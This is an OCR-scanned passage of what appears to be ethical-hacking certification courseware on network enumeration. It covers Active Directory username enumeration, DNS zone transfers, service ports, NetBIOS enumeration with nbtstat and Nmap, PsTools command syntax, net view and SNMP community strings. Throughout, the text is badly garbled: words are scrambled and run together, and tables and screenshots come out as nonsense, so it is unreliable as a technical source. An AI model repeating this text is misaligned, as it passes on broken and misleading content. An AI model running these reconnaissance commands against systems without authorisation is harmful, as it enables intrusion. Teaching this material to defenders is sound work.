attacker's
taskofenumerating andexploiting the targetsystem,
BruteforceActiveDirectory
MicrosoftActive Directory is susceptibleto username enumeration at the time of user-
supplied
inputverification.
This is a design
error in the Microsoft Active Directory
implementation. If a user enablesthe “logon hours―feature,then all the attemptsat
service authenticationresulti n different
error messages. Attackers takeadvantage ofthis
can conduct
a brute-force
attacktocrack succeeds
to enumerate valid usernames. An attackerwho
passwords.
the respective
i n extractingvalid usernames

Extractinformation
usingDNSZoneTransfer
‘A
networkadministratorcan use

zone-transfer
specific
DNS
zone across
transferto replicate
DNSdata several
DNSservers or backup DNSfiles.For this purpose,the administratorneedsto execute a
requestto the name server. If the name server permitszone

ical andCountermensores
Mackin ©by E-Comel
Copyright
 it will convert all theDNSnamesandIPaddresses
transfer, hostedbythatserver to ASCII
text.
did not configure
If the networkadministrators the ONSserver properly,
the DNSzone
transfercan be an effectivemethodto obtain informationabout the organization's
network.Thisinformationmay
addresses. Auser can performinclude
lists
of
zone
DNS
all namedhosts,
transferusingnslookup
sub-zones,
andrelatedIP
anddigcommands.
Extractu ser groupsfromWindows
To extract user groupsfromWindows,the attackershouldhavea registeredID as a user
in the ActiveDirectory.Theattacker
can then extract information
fromgroupsin which
the user is a memberbyusingthe Windowsinterfaceor command-line method.
Extract usernamesusingSNMP
can easily
‘Attackers guessread-onlyor read-write community stringsbyusingthe SNMP
application
programming interface(API)to extract usernames.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Servicesand Portsto Enumerate

a= oman
Nome (Oo Tamer
3)

>
[rerniorae
ap incr ha tw
SAP)
rer/uoP135 re92009
ES [eer wcenonirm I

05 me ec HS) ‘Se ser

rer339 Ter/uor162

Ter/u0P
848s oe TE ret ot
vor S00
‘inert ey cone

Sil eter ange Prt (A See Sn 5H)

ServicesandPortsto Enumerate
Control Protocol (TCP)
Transmission and User Datagram
Protocol (UDP)
manage data
communicationsbetween
terminals
i n a network.

TCPis a connection-oriented capable

protocol ofcarryingmessages or emailsover the Internet.
It provides
a reliablemulti-process
communication service i n a multi-networkenvironment. The
features
=
of
andfunctionsTCPinclude

Supports
acknowledgement
for dataa
the following:
receiving throughsliding
window
acknowledgement system
Offersautomatic retransmissionoflostor acknowledged
data
Allowsaddressing andmultiplexingof data
A connection can be established,
managed,
or terminated
=
Offersquality-of-service
transmission
Offers congestion andflowcontrol
management
UDPis a connectionless that carries shortmessages
protocol network.It
over a computer

provides
unreliable
=
service.UDP the
Theapplications
Audiostreaming
of include following:

and
Videoconferencing
teleconferencing,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 andTCP/UDP
Services portsthatcan beenumerated thefollowing.
include

53:Zone
Transfer
‘TCP/UDP
DNS
TheDNSresolutionprocess establishes communication betweenDNSclientsand ONS
servers. DNSclients sendDNSmessages to DNSservers listeningon UDPport53. If the
DNS
message
size
exceeds
defaultoctets),
response
contains
the
the datathat UDP can accommodate,
size of UDP (512 the only
and the DNS server setsa flagto indicatethe

the DNS client

truncatedresponse.
server.
case of lengthy
TheDNS
In this approach,
can now resendthe request via TCPover port53 to
the DNSserver uses UDPas a defaultprotocol. In the
queriesfor whichUDPfails,TCPis usedas a failoversolution.Malware
suchas ADM worm and BonkTrojan uses port53 to exploit vulnerabilitieswithin DNS
servers, helpingintruderslaunchattacks.
TCP/UDP 135: MicrosoftRPCEndpoint Mapper
Source:https://technet.microsoft.com
RPC is a protocol
usedbya clientsystem to request a service froma server. An endpoint
is the protocolporton whichthe server listensfor the client’s RPCs. TheRPCEndpoint
Mapper
enables
RPC RPC
clients
determine
service. number
currently
assigned
messages
incorrect handling over
to the port
Thereis a flaw i n the partof RPC
of malformed messages
that exchanges
causesfailure. Thisaffects
to a specific
TCP/IP.
The
the RPCEndpoint
Mapper, whichlistenson TCP/IP port135.Thisvulnerability couldallow an attackerto
Mapper
process
sendRPCmessages
of-service(DoS)
to theRPC
attack.
Endpoint on a server to launcha denial:

UDP137: NetBIOS NameService(NBNS)

NBNS, alsoknownas the WindowsInternet Name Service(WINS), providesa name.
resolutionservice for computers runningNetBIOS.NetBIOSname servers maintain a
databaseof the NetBIOS names for hostsandthe corresponding IPaddressthe hostis
using.NBNSaims to matchIP addresses with NetBIOSnames andqueries.Attackers
usuallyattackthe name service first. Typically,NBNSuses UDP137 as its transport
protocol.It can alsouse TCP137as its transportprotocolfor a fewoperations,though
this mightnever occur i n practice.

TCP139:NetBIOS Session Service(SMB over NetBIOS)

TCP139 is perhapsthe most well-knownWindowsport. It is used to transferfilesover a
network.Systems use this portfor both null-session
establishment as well as file and
printersharing.
Asystemadministrator considering
the restriction of access to portson a
Windowssystem shouldmakethe restriction of TCP139a top priority. An improperly
configuredTCP 139 portcan allow an intruderto gain unauthorizedaccess to critical
systemfilesor the complete file system,resultingi n data theft or other malicious
activities.
‘TCP/UDP
445:SMBover TCP(Direct
Host)
file- andprinter-sharing
Windowssupports directly
trafficusingthe SMBprotocol hosted
on
TCP.
earlier
OSs,
In
traffic over
TCP
SMB required
theNetBIOS

ical
(NBT)
protocol
andCountermensores
Mackin
to work

©by E-Comel
Copyright
on TCP/IP Directly
transport. andUDP)
hostedSMBtrafficusesport445(TCP instead
of
NetBios.
UDP161: Simple Protocol(SNMP)
NetworkManagement
SNMPis widely used i n network management systemsto monitor network-attached
devicessuchas routers, switches,
firewalls, andservers. It consistsof amanager
printers,
andagents.Theagentreceives requestson port161fromthe managers andresponds to
the managerson port162.
TCP/UDP
389:Lightweight
Directory
AccessProtocol(LDAP)
LDAP is a protocol
for accessing distributeddirectory
and maintaining information
services over an IPnetwork.Bydefault,LDAPusesTCPor UDPas its transport
protocol
overport 389.
(NFS)
2049:NetworkFileSystem
‘TCP
NFSprotocol is usedto mount filesystems on a remote hostover a network, and users
as if they
with the file systems
‘aninteract are mountedlocally. NFSservers listento its
client systems o n TCPport 2049. If NFSservices are not properly configured, then
attackersmay exploit the NFSprotocol to gain controlover a remote system, perform
privilege injectbackdoors
escalation, or malware
o n a remote host,
ete.
Mail Transfer
TCP25: Simple Protocol(SMTP)
SMTP TCP/IP
is a maildelivery protocol.
It transfersemailacross the Internet andacross
localnetworks.
It runs on the connection-orientedservice provided byTCPandusesthe
well-knownportnumber25.Belowtablelistssome commands usedbySMTPandtheir
respective
syntaxes.
Hello
From

Recipient.
Data
Reset

Verity
Expand
Help
uit

TCP/UDP
162:SNMPTrap
Table
4.1:SMTP
and
c ommands theirrespective
sytaxes

SNMPtrapuses
‘An TCP/UDP
port162 to sendnotificationssuchas optional
variable
bindings
andthe sysUpTime
toa
valuefroman agent manager.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 AssociationandKeyManagement
UDP500:Internet Security Protocol
(ISAKMP)/Internet
KeyExchange
(IKE)
Internet Security Association and KeyManagement Protocol(ISAKMP)/InternetKey
Exchange (IKE)
is a protocol
suite. It uses UDP port 500 to establish,
cryptographic keys
security
association
usedto set upa
negotiate,
network(VPN)
i n a virtual private
(SA)
modify,
environment.
protocol
i n theIPsec
and delete SAs and

TCP22:SecureShell(SSH)
Secure Shell (SSH) is a command-level protocolmainlyusedfor managingvarious
networkeddevices
Telnetprotocol.
default,
securely.
used
as
tis generally an alternative
SSHuses the client/server communication model,
listensto its clienton TCPport22.Attackersmayexploit
to
the
protocol unsecure
andtheSSHserver, by
the SSHprotocolby
brute-forcing SSHlogin credentials
TCP/UDP3268:GlobalCatalog
Service
GlobalCatalog
Microsoft’s server, a domain
controller
thatstoresextra information,
port3268.Itsdatabasecontains rows for everyobject
in the entire organization,
uses
instead
of rows for
only
the objects
Catalog
i n one domain.Global
fromany domainwithout having one allows to locateobjects
to knowthedomainname. LOAP
through
server uses port 3268. Thisservice listensto port 3268
in theGlobalCatalog
a TCP connection
Administratorsuse port 3268 for troubleshooting issues in the Global Catalog by
connecting to it usingLOP.

‘TCP/UDP5060,5061:Session (SIP)
Initiation Protocol
TheSession initiationProtocol(SIP)is a protocol forvoice and
usedi n internettelephony
Videocalls.It typicallyuses TCP/UDP port$060(non-encrypted signaling
trafic)or S061
{encryptedtrafficwith TLS) forSIPto servers andotherendpoints
TCP20/21:
FileTransfer
Protocol
FTPis a protocol
connection-oriented usedfor transferring
files over the Internetand
privatenetworks. FTPis controlledo n TCPport21,and fordatatransmission, FTPuses
TCPport20 or some dynamic portnumbersdepending on the server configuration. If
attackers
identify
that FTPserver portsare open,thenthey perform enumeration on FTP
to find informationsuchas the softwareversion and state of existing
perform further exploitations
suchas the sniffing
vulnerabilitiesto
of FTP traffic and FTP brute-force
attacks.
TcP23: Telnet
TheTelnetprotocolis usedfor managing various networkeddevices remotely. It is an
unsecure protocolbecauseit transmits logincredentialsin the cleartext format.
Therefore,
itis mostly
usedi n privatenetworks.TheTelnetserver listensto its clientson
port23.Attackers
can takeadvantage to perform
ofthe Telnetprotocol bannergrabbing
onprotocols
other
SMTP,
forwarding brute-forcing
attacks,attacks
credentials
suchas SSHand
etc.
on login port-

ical andCountermensores
Mackin ©by E-Comel
Copyright
UDP69:TrivialFileTransfer (TFTP)
Protocol
TFTPis a connectionless protocol usedfor transferringfiles over the Internet, TFTP
on UDP; not the
dependsconnectionlesstherefore,
properit does guarantee
of the file to the destination.TFTPis mainlyusedto update or upgrade
firmwareon remote networkeddevices.It uses UDP port69 for transferring
transmission
softwareand
files to a
remote host.Attackersmayexploit TFTPto installmalicioussoftwareor firmwareon
remote devices.
TCP179:Border Protocol(BGP)
Gateway
BGPis widely usedbyInternet service providers (ISPs)to maintain huge routingtables
andfor efficiently
processingInternet traffic.BGProuters establishsessions on TCPport
179.Themisconfigurationof BGPmayleadto various attackssuchas dictionary attacks,
attacks,
resource-exhaustion flooding attacks,andhijackingattacks.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow ¢

[NetBIOS
Enumeration SMTPand DNSEnameration

LDAPEnumeration ‘Enumeration
Countermeasures

NetBIOSEnumeration

“©
ANet910s
are
names
eedforthe
2

character
device
name, dently
characte
r record
unique16ACI

type
andthesistent
stringwed
freserved
thenetworkSecs
fortheservice
ver
name
TRAPfen characters

Tento¥
name
 NetBIOSEnumeration(Cont'd)
T heasta syn Windows splaysNetBIOS
over
TEI (Nets)

NetBIOSEnumeration
far,w e discussed
‘Thus enumeration concepts andresourcesthat provide valuableinformation.
Thissection describesNetBIOSenumeration, the informationobtained,and various NetBIOS
enumeration tools.NetBIOSis considered firstfor enumeration because it extracts a large
amount of sensitive informationaboutthe targetnetwork, suchas users andnetworkshares.

‘The
firstenumerating
was
stepi n
originally
developed
sharing.
resources. Windows
of
advantage
NetBIOS
API. a Windows is to take
system the
as an API for client softwareto access local area network (LAN)
uses Net8I0S for file andprinter TheNetBIOS name is a unique 16-
NetBIOS.

characterASCIIstringassigned to Windows to identify

systems networkdevices over TCP/IP; 15
characters
are usedfor the devicename, andthe 16this reservedfor the service or recordtype.
NetBIOS
(session
usesUDP
services).
run on Windows
port services),
137(name
port services),
Attackersusually
systems
port
UDP 138(datagram andTCP 139
targetthe NetBIOSservice becauseit is easy to exploit
even whennot in use.
and

enumeration to obtainthe following:

Attackersuse NetBIOS
"=

‘=
The
Thecomputers
list of

shares
the domain
individual
hosts
list of
networkon
that belong
to a
in a
=

Policies
who
andpasswords
attacker findsa Windows
‘An system with port139opencan check to see whichresources
can beaccessed or viewedon a remote system. However,to enumerate theNetBIOS names,the
remote system sharing.
must haveenabled fileandprinter NetBIOSenumeration mayenable an
attackerto reador write to a remote computer depending
system, of shares,
o n the availability
or launcha DoSattack.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 || ||
host name>

<domain>
<00>
<00> GRouP
||Domain
UNIQUEHostname
name

<host
|| |name>

<username>
<03>_| UNIQUE
<03> UNIQUE
|Messenger
service
|Messenger
forlogged-in
service
runningfor the computer
running the user

|| | |Server
service
host name> <20>_| UNIQUE running
<domain> <1D> GROUP
|Master
name
forsubnet,
browser
Domainmasterbrowser
the
name,whichidentifies
theprimary
| |
sdomain <18> UNIQUE
|domain
controller
(POC)
domain for the

| | |
‘domains <1E> GROUP Browserservice elections
Table 42:
NetBIOS
name at

Notethat Microsoftdoesnot support

NetBIOS
name resolutionfor Pv6.

Nbtstat Utility
Source:https://docs.microsoft.com
utilitythat helps
Nbtstati s a Windows i n troubleshooting name resolutionproblems.
NETBIOS
Thenbtstat commandremoves and corrects preloaded
entries using severalcase-sensitive
switches.
Attackersuse Nbtstatto enumerate information (NetBT)
suchas NetBIOSover TCP/IP
protocol NetBIOS
statistics, name tablesfor bothlocaland remote computers,andthe NetBIOS
name cache,
Thesyntaxofthenbtstatcommand is as follows:
nbtstat [-a RemoteName] [-A IP Address] [-c]
[-8] [Interval]
Thetable shownbelowlistsvarious Nbtstatparameters
andtheirrespective
functions.
Nbtstat
Function
Parameter
=a RemoteNiameDisplays
| sheNetBIOScomputer of
the NetBIOSname table a remote computer,
name of the remote computer
whereRemoteNameis,

“A
IP Address
notation)
address(indotteddecimal of specified
the NetBIOSname table a remote computer,
Displays
of the remotecomputer
bytheIP

of
Liststhe contents the NetBIOS
their resolvedIPaddresses,
name cache,
the tableof NetBIOSnames and

Displaysthe names locally

registered byNetBIOSapplications
suchas the server
and redirector
Displays
a
countofall names resolvedbya broadcastor WINSserver

ical andCountermensores
Mackin ©by E-Comel
Copyright
 thename cache
Purges allHPRE-tagged
andreloads entriesfromthe Lmhosts
file
Releases all names with thename
and re-registers server

Liststhe NetBIOS
NetBIOSnames
sessions table converting
destination IP addressesto computer

sessions andtheir statuswith theIPaddresses

Liststhe current NetBIOS

Interval Re-displays pausingat eachdisplay

selectedstatistics, for the numberof seconds.
specified
i n Interval

Table4.3:
Nbstatparametersandthelr respective func

following
‘The are some examples
for nbtstatcommands.
=
Thenbtstatcommand
“nbtstat
~a <IP address of the remote machine>"
can
beexecutedto obtainthe NetBIOS
a
n ame tableof remote computer.

=
4;
Figure
Nbtstat table
remote
command

Thenbtstatcommand“nbtstatce―
system
to obtainthe name

can beexecuted
ofa

to obtainthe contents of the

n ame cache,
NetBIOS the tableof NetBIOS
names,andtheir resolvedIPaddresses.

42; Nbtstat
Figure commandto obtainthe contentsofthe NetBIOS
name table

ical andCountermensores
Mackin ©by E-Comel
Copyright
 1
NetBIOS
Enumeration
Tools CEH
|
none,
:Sxethor Donan
nome
Usonesa
‘Nmap
feow scot
bare alow
aac
tine

NetBIOSEnumerationTools
enumeration toolsexplore
NetBIOS andscan a networkwithin a given range of IPaddresses
and
listsof computers to identify loopholes
security or flawsi n networked systems.Thesetoolsalso
enumerate operating systems(OSs),
users,groups,Security Identifiers(SIDs),
passwordpolicies,
services, service packs and hotfixes,
NetBIOSshares, transports, sessions,disksand security
event
+
logs,
ete.
NetBIOSenumerator
Source:http://nbtenum.sourceforge.net
NetBIOSEnumeratoris an enumeration tool that showshowto use remote network
supportand to dealwith some other web protocols,suchas SMB.As showni n the
attackers
screenshot, u se NetBIOSEnumeratorto enumerate detailssuchas NetBIOS
names,usernames,domainnames,andmediaaccesscontrol(MAC)
addresses
for a given
rangeof IP addresses.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 NetBIOS
Enumerstor

an
‘Attackers
to
specty IPrange
NetBIOS
information
‘enumerate

‘Obtain
information,
such
NetBIOS
5
names,
-Fle ‘usernames,
domain
ersten Se

and
MAC
SERVERIOU6Sever Ser
DUsers:
&Donan:
Qoone

WIC: 0000-2
ged on ‘names,
addresses

@ Rand

4.3:Sceenshot ofNetBIOS
Figure Enumerator

Nmap
Source:https://nmap.org
Attackersuse the Nmap ScriptingEngine (NSE)for discovering NetBIOSshareson a
network.Thenbstatscriptof NSEallowsattackers
and MACaddresses.
logged-in
Bydefault,
if theverbosity
user. However,
to
the scriptdisplays retrieve
the target'sNetBIOS
the name of the computer
isturnedup,it displays
n ames
andthe
all names related
to that
system.
‘As an attackeruses the following
showni n the screenshot, Nmapcommandto perform
NetBIOSenumeration on a targethost:
--script nbstat.nee <target IP address>

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ‘cript_nbstatnse10.10,10.16
starting Nmap7.70
ipt
(

Loaded 44 scripts for scanning,

Pre-scanning
)
Attps:/7nmap-orgat 2019-10-31 07:11 EDT

ing NSEat 07:11

red at 07:11, 0.005 ela
NSE
ng NSE at 07:11
red NSE at 07:11, 0.005 elapsed
ing ARPPing Scan at 67:11
anning 10.10.10.16 [1port)

Figure44:
Screenshot
of Nmap
c ommand
for
Net810S
enumeration

Thefollowing
Figure
45:
some
NetBIOS
enumeration
output
Screenshot
additionalNetBIOS
of Nmap

are (http://www.magnetosoft.com)
enumeration tools:
GlobalNetworkInventory
=
Advanced (http://www.advanced-ip-scanner.com)
IP Scanner
=
(https://www.systemtools.com)
Hyena
Auditor (https://www.nsauditor.com)
NsauditorNetworkSecurity

ical andCountermensores
Mackin ©by E-Comel
Copyright
 UserAccounts
Enumerating
|G Enumerating
user accountsusingthePsTools
suitehelp to conto n d fomthe
r emote systems
manage

UserAccounts
Enumerating
Source:https://docs.microsoft.com
user accounts usingthe PsTools
Enumerating i n controlling
suite helps and managingremote
fromthe commandline. Thefollowing
systems are for enumerating
some commands user
accounts.
=
PsExec
is a lightweight
PsExec Telnetreplacement
that can execute processes
on othersystems,
complete without having
for consoleapplications,
with full interactivity to installclient
softwaremanually,
powerful
use of
PsExec’s
most caseis thelaunch interactivecommand
and remote-enabling
promptson remote systems toolssuchas Ipconfigthat otherwise

follows about
remote of
cannot showinformation Thesyntaxthe PsExec
systems, command i s as

[-h]{-s|-e] [-c [-
psexec [\\computer[,computer2[,...] | @file]][-u user [-p psswd]
n s][-r servicename] [-1] [-x][-I [session] [-f1-
v]] [-w directory] [-d] [-<priority>][-a n,n,...] md [arguments]
PsFile
PsFile
utility a of opened
is acommand-line thatshows list fileson a system
andit can closeopened
fileseither byname
that remotely,
or bya file identifier.Thedefaultbehaviorof
PsFile
PsFile
isto
list
the
files
"-"
followedby
command
local
system by
on the
displays
is as follows:
a opened remote systems.
informationon the syntaxfor that command.
Typingcommand
Thesyntax
of the

[-u Username [-p Password]]] [[Id | path]

psfile [\\RemoteComputer

ical andCountermensores
Mackin ©by E-Comel
Copyright
 PsGetsid
PsGetSid translatesSIDsto their displayname and vice versa. It workson built-in
accounts,domainaccounts,andlocalaccounts.It alsodisplays the SIDsof user accounts
andtranslatesan SIDinto the name that representsit. It worksacross the networkto
query SIDsremotely.Thesyntax of the PsGetSid
command is as follows:

psgetsid [\\computer[,computer[,...] | @file] [-u username [-p

]][account|
password]
Pskill
SID]

Pskillisa kill utilitythat can kill processeson remote systems

andterminate processes on

on
the Pskill
is ID
thelocalcomputer.
name Pskill
Running witha process directsi t to kill theprocessofthatID
all that
localcomputer.
have
Ifa process specified, wll kill processes

syntax
of to
that name. Oneneednot installa clienton thetarget
The
a remote process. the Pskillcommand
computeruse Pskillto terminate
i s as follows:
pskill [- ] [-t] [\\computer[-u username] [-p password] <process
name | process id>
Psinfo
Psinfo
i s acommand-line
WindowsNT/2000
organization
tool that
systems, gathers
including
keyinformation
aboutlocalor remote legacy
the typeof installation,
andowner, numberof processors
kernel build,registered
and their type,amount of physical

Bydefault,Psinfo
be specified
of
memory, installationdate the system,
showsinformation
andexpiration
datei n the case of atrialversion.
forthelocalsystem.A remote computer
to obtain informationfor a remote system.
name can
The syntaxof the Psinfo
commandi s asfollows:
psinfo [{\\computer{,computer[,..]| @file
(-p psswd]]] [-b] [-s] [-d] [-e [-t delimiter]] —
[-u
[¢ilter]
PsList
PsListis a command-linetool that displays unit (CPU)
centralprocessing and memory
informationor thread statistics.Toolsin the ResourceKits,pstatand pmon,show
differenttypesof dataonly
PsLoggedOn
for
the processeson the system
on whichthe toolsare run.

PsLoggedOn
is an applet
thatdisplays
boththe locally
logged-in
usersanduserslogged
in

intIfhe
via resources for eitherthe localcomputer or a remote one. a username is specified
insteadof acomputer,

that hasa profile

‘one
PsLoggedOn
andrevealsif the user currently searches
the
computers
logged network
in. PsLoggedOn
loadedinto the registry.
definesa locally
Therefore,PsLoggedOn
neighborhood
logged-in
user is
determineswho is
logged in byscanning the keys underthe HKEY_USERS key.Foreachkeythat has aname
for user SID, PsLoggedOn looks up the corresponding username and displays it. To
determinewho logged into a computer via resource shares, PsLoggedOn uses the
NetSession€num API. Thesyntax of the PsLoggedOn commandis as follows:
psloggedon[- ] [-1] [-x] [\\computername
| usernai
Modul
8
Page£09 ical andCountermensores
Mackin
©
Copyright
by E-Comel
PsLoglist
The
elogdump
utility
PsLoglistdumpscontents
of Log
on
alocal
remote
compute
the
is a cloneof elogdump
anEvent
exceptthat PsLoglist
or
can logi n to remote systemsin

where
the
user's
situations
and PsLoglist credentials
access
Log,
security
retrieves message
wouldnot permit
stringsfrom the computer
stored.Thedefaultfunctionof PsLogList is to display
to the Event
on whichthe event logis
the contents of the System Event
Logo n the localcomputer with visually
friendly formatting.Thesyntaxof the PsLoglist
commandi s as follows:
psloglist [- ] [\\computer{,computer[,...] | @file [-u username [-
P password}]][-s [-t delimiter]] [-m #I-n #1-h #I-d #1-w][-c] [-
{-b [-£
xl (-2] [-a mm/dd/yy] mm/dd/yy] filter] [-i ID[,2D[,...] | -e
ID[,ID[,...]]] [-0 event source[,event source]
source[,event source]
[,..]]][-a event
[,..]]][-1 event log file] <eventlog>
PsPasswd
PsPasswd c an change a n account password on local or remote systems, and
administrators can create batchfilesthat run PsPasswd on the computerstheymanage
to perform a mass change of the administratorpassword, PsPasswd uses Windows
password reset APIs; therefore, it doesnot send passwords over the network i n the
cleartext.Thesyntax ofthePsPasswd command i s as follows:
pspasswd [[\\computer[,computer[,..] | @file [-u user [-p psswd]]]
Username[NewPassword]
PsShutdown
PsShutdown can shutdownor reboota localor remote computer.
It requires no manual
of
installationclient software.
ThesyntaxofthePsShutdown
psshutdown[[\\computer{,computer[,..]|
command i s as follows:
| @file [-u user [-p
psswd]}] -s|-r{-hl-dl-kl-al-1l-0 [-£]
[-e] [-t an{h:m] [-n s] [-v
an] [-e [ulp]:xx:yy] [-m "message"]

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Net
SharedResourcesUsing View
Enumerating
(© T h e
Wets aist
of
allshared
resoutes
Viewuty
ofa
remote
host
workgroup
t o obtain
used the or

‘NetView
Commands

©

©
netview

notview
\\ccomputername>

/domain<domain
name>

[Fora

SharedResourcesUsing
Enumerating Net View
NetView is a command-line utilitythat displays
a listof computers i n a specified
workgroup
or
shared o n a specified
r esources available computer.It can beusedi n thefollowingways.
net view \\<computername>
In theabovecommand, <computername>
resources of whichare to be displayed,
is the nameor IP
address
specific
computer,
of a the

net \\<computername>
view /ALL

all
Theabovecommand
shares.
displaystheshareso n thespecified along hidden
remote computer,
with
net view /domain

‘The
net view
all inthe
displays
abovecommand
/domain:<domainname>
the shares domain,

‘The displays
abovecommand all theshareso n the specified
domain.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 screenshot
‘The r esourcesavailableon the specified
showstheshared computer,

Command Prompt
Administrator.
BEd

4.6:
of command
Figure Output Net View

8
Module 412
Page tical andCountermensores
Making Copyright©
by Comet
 ModuleFlow

[NetBIOS
Enumeration

LDAPEnumeration

SNP userholds
process two
enumerating
the
SNMP
enumeration

community
strings
ithe (©SNMP passwords
configure
to (e Aackers use these
default

Sccounte
devices
of and
‘access ta entract
and {agent fomthemanagement Information device

target
system
on a about
usingSNMP station

consists
Rea sting:
tackersenumerateSNMP to

alows
forthe
ts

an agents
SNMP ofmanager © community pub tetra informationabout
and agent; are by default wing network resources, such
a3
embeded on everynetwork ofthedes ontguation hosts, and
routers,devices,
‘evi,andthemanageris shares,andnetwork
Insaledon
by9

traffic
separate
feat
prnate dtl
sing ts
community
allowsrete information,suchaARP tables,
routingtables,and

S Ea &
SNMPEnumeration
SNMP allows network administrators
to managenetworkdevicesfrom a remote location
However, vulnerabilities,
SNMPhasmanysecurity suchas a lackof auditing,
Attackersmaytake
advantage
of thesevulnerabilitiesto perform
account and deviceenumeration. Thissection
describes
SNMPenumeration, the informationextractedvia SNMPenumeration,and various
SNMPenumeration toolsusedto enumerate user accountsanddeviceson a target
system,

ical andCountermensores
Mackin ©by E-Comel
Copyright
SNMPis an application-layer that runs on UDPandmaintains and managesrouters,
protocol
hubs,
andswitcheson an IP network.SNMPagentsrun on Windowsand Unix networkson

networking
devices.
SNMPenumeration is the process
of creatinga listof the user’s
accountsanddeviceson a target
computerusingSNMP.SNMPemploys two types of softwarecomponents for communication
theSNMPagentandSNMPmanagement station, TheSNMPagenti s locatedon the networking
device,
andthe SNMPmanagement station communicateswiththe agent.
Almostall the networkinfrastructuredevicessuchas routersandswitchescontain an SNMP

agent; the
agentfor managingsystem
variablesaccessible
management
station
sendstothe
or devices.TheSNMP
the agentreplies.
afterreceivingthe request, Bothrequests
bythe agentsoftware.SNMPmanagement
andreplies
requests
are configuration
stations sendrequeststo set
values
tosome let
Traps the station
management
variables.
know
ifan event
such
asa
rebootor an interfacefailurehasoccurredat theagent's
side.
abnormal

SNMPcontainsthe following
two passwords
for configuring
andaccessingtheSNMPagentfrom
themanagement
station.
=
ReadCommunityString
© The configuration
of the deviceor systemcan be viewedwith the helpof this
password.
©.
These
public.
stringsare
=

©
Community
Read/Write
String
Thedeviceconfiguration
can be changed
or editedusing thispassword.

©. Thesestrings
are private.

Whenadministrators leavethe community attackerscan use these

at the defaultsetting,
strings
default
community
system.
strings(passwords)for changing or viewingthe configuration
of the
device
Attackersenumerate SNMPto extract informationaboutnetwork resources suchas
hosts,routers,devices,andsharesas well as networkinformationsuchas ARPtables,routing
or

tables,
device-specific
information,andtrafficstatistics.
CommonlyusedSNMPenumeration toolsincludeOpUtils
(https://www.manageengine.com)
Monitor (https://www.solarwinds.com)
andNetworkPerformance

ical andCountermensores
Mackin ©by E-Comel
Copyright
 of SNMP
Working

ofSNMP
Working
SNMPuses a disturbedarchitecture
comprising SNMPmanagers, SNMPagents,and several
relatedcomponents.Thefollowingare some commands associated
with SNMP.

*
=
GetRequest:
GetNextRequest:
manager
Usedbythe SNMP
Usedbythe SNMP
information
to request

continuously
manager
all agent
froman SNMP
to retrieve thedatastored
inan arrayor table

Used
by
Used an
GetResponse:
SetRequest: by the
SNMP
SNMP
to a
agent satisfyrequest by
manager modify
t o the
made the SNMPmanager
valueof within an
a parameter
‘SNMP agent’s
managementinformationbase(MIB)
Trap:
event
by
ofa
pre-configuredmanager
Used an SNMPagentto informthe SNMP certain

Thecommunication
‘+
TheSNMP
process
manager
(Host and
X,10.10.2.1)
SNMP as
betweenan SNMPmanager

to
agentis follows.
uses the GetRequest
command senda request

step,the SNMP manageruses an SNMP service library

Management (Mgmtapi.dll)
APIlibrary or MicrosoftWinSNMP
Y,
for thenumberof active sessionsto theSNMPagent(Host 10.10.2.15).

APIlibrary
To perform
this,
suchas the MicrosoftSNMP
(Wsnmp32.dll).
+
TheSNMPagent(Host Y)receives the messageand verifiesif the community string
{Compinfo)
is present checks
on its MIB, the request its list ofaccesspermissions
against
for that community,
andverifiesthe source IPaddress

ical andCountermensores
Mackin ©by E-Comel
Copyright
If the SNMPagentdoesnot findthe community
stringor accesspermission
in HostY's
MIB databaseandthe SNMPservice is set to senda n authenticationtrap,it sendsan
failuretrapto thespecified
authentication trapdestination,HostZ.
Themaster agentcomponent of theSNMPagentcallsthe appropriate
extensionagentto
retrieve the requested
session informationfromthe MIB.
Usingthe sessioninformation
retrievedfromthe extension agent,the SNMPservice
formsa return SNMPmessagethat contains the numberof active sessions and the
destination (10.10.2.1)
IP address of theSNMPmanager,HostX
Host¥sendsthe response
to HostX.

comma
Seng
“Conant
Gah

ot
2(MP Stage)
(24.7:lusrationoftheworking
ofSNMP

ical andCountermensores
Mackin ©by E-Comel
Copyright
 InformationBase(MIB)
Management
'Mibicavitual
managed databace
usingSNMP
containing description
2 format objects
ofallthe network thatcanbe

T heMiBdatabase ishierarchcal
andeachmanaged
objetina MBs adressethoughObject
dentfiers (10s)

managed
abject
Twotypesof exist

(1Dtheobject,
a8
includes typeofMIB such counter,
stringadres: acces lve, sucha8 not

uses
SNMP
MB's the Nerarcical
hhuman-eadabledslay
namespace O1Dstoarate
containing theOIDnumbersinto
a
Information Base(MIB)
Management
MIB is a virtualdatabasecontaining a formaldescription of all the networkobjects
that SNMP
manages.It is a collection of hierarchically organized information. It provides
a standard
representation
object of
the
SNMP
agent's
information
identifiers(O1Ds). andMIBare storage. elements recognized
An OID is the numeric name givento an object andbegins
using
withthe root
of
MlB-managed
uniquely
objects
identify
the MIB tree. TheOIDcan
includescalarobjects,
the objectin the MIB hierarchy,
whichdefinea single object instance,andtabular
objects,whichdefinea groupofrelatedobject instances.OIDsincludetheobject'stype(suchas
or address),
counter, string, as reador read/write),
access level(such andrange
size restrictions,
information.
TheSNMP
asa codebook. manager
converts
OIDs display
human-readablethe into a usingtheMIB

‘A.user
canaccess the contents of the MIB byusing a web browsereither byenteringthe IP
addressand Lseries.mib or byentering the DNSlibraryname and Lseries.mib.For example,
http://IP.Address/Lseries.mib
or http://library_name/Lseries.mib.Microsoft
provides
the list of
MBsthat are installedwiththe SNMPservice i n theWindows resource kit.ThemajorMIBsare

as
follows:
=
DHCP.MIB:
Monitors networktrafficbetweenDHCPservers andremote hosts
‘=
HOSTMIB.MIB:
host
Monitorsandmanages resources
‘=
LNMIB2.MIB:
‘MIB_ILMIB:
Contains
Manages
object
types
workstation
TCP/IP-based
for
Internetusinga simple
andserver services
architectureandsystem
WINS.MIB:FortheWindowsInternetNameService(WINS)

ical andCountermensores
Mackin ©by E-Comel
Copyright
 SNMPEnumerationTools

SSnmpeheck
| pace otpatn
wry
burn
ode

SNMPEnumerationTools
SNMPenumeration toolsare usedto scan a single
to Module)
networkdevices monitor,diagnose,
enabled andtroubleshoot a
